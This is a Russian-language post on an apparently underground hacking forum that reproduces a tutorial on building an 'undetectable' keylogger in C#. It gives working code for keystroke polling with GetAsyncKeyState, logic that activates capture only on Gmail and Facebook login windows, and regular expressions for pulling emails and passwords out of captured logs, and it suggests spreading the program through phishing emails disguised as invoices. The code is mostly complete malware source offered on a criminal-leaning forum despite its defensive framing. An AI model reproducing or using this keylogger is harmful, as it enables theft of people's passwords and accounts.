Учимся писать полностью «не обнаружимый» кейлогер

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 2K
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость


Хакерский мир можно условно разделить на три группы атакующих:



1) «Skids» (script kiddies) – малыши, начинающие хакеры, которые собирают известные куски кода и утилиты и используя их создают какое-то простое вредоносное ПО.



2) «Byuers» — не чистые на руку предприниматели, тинэйджеры и прочие любители острых ощущений. Покупают услуги по написанию такого ПО в интернете, собирают с ее помощью различную приватную информацию, и, возможно, перепродают ее.



3) «Black Hat Сoders» — гуру программирования и знатоки архитектур. Пишут код в блокноте и разрабатывают новые эксплоиты с нуля.



Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО.



Зачем ИБ-персоналу эти сомнительные навыки?



Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно.



Для этого неформального класса «hacking 101» вам необходимы небольшие знания в программировании (С# и java) и базовое понимание архитектуры Windows. Имейте ввиду, что в реальности вредоносное ПО пишется на C/C++/Delphi, чтобы не зависеть от фреймфорков.



Кейлогер



Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.

Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.



Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.



Начнем.



Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:



1. [DllImport("user32.dll")]
2.
3. public static extern int GetAsyncKeyState(Int32 i);





Вы можете изучить больше про фунцию GetAsyncKeyState на
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
:



Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:



1. while (true)
2. {
3. Thread.Sleep(100);
4. for (Int32 i = 0; i < 255; i++)
5. {
6. int state = GetAsyncKeyState(i);
7. if (state == 1 || state == -32767)
8. {
9. Console.WriteLine((Keys)i);
10.
11. }
12. }
13. }





Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику.



Умный кейлогер



Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?

Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.



Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных.



Вторая версия кода:



1. while (true)
2. {
3. IntPtr handle = GetForegroundWindow();
4. if (GetWindowText(handle, buff, chars) > 0)
5. {
6. string line = buff.ToString();
7. if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up "))
8. {
9. //проверка клавиатуры
10. }
11. }
12. Thread.Sleep(100);
13. }





Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры.



Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail.



Еще более умный кейлогер



Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.



Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:



1. //Ищем почтовый адрес
2. ^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$
3.
4.
5. //Ищем пароль
6. (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])





Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.

Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.



Для C# это выглядит так:



1. Regex re = new Regex(@"^[\w!#$%&amp;'*+\-/=?\^_`{|}~]+(\.[\w!#$%&amp;'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$");
2. Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])");
3. string email = "[email protected]";
4. string pass = "abcde3FG";
5. Match result = re.Match(email);
6. Match result2 = re2.Match(pass);





Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.



Бесплатно и полностью не обнаружим



В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут.

Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения.



Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ?



Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось.

 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя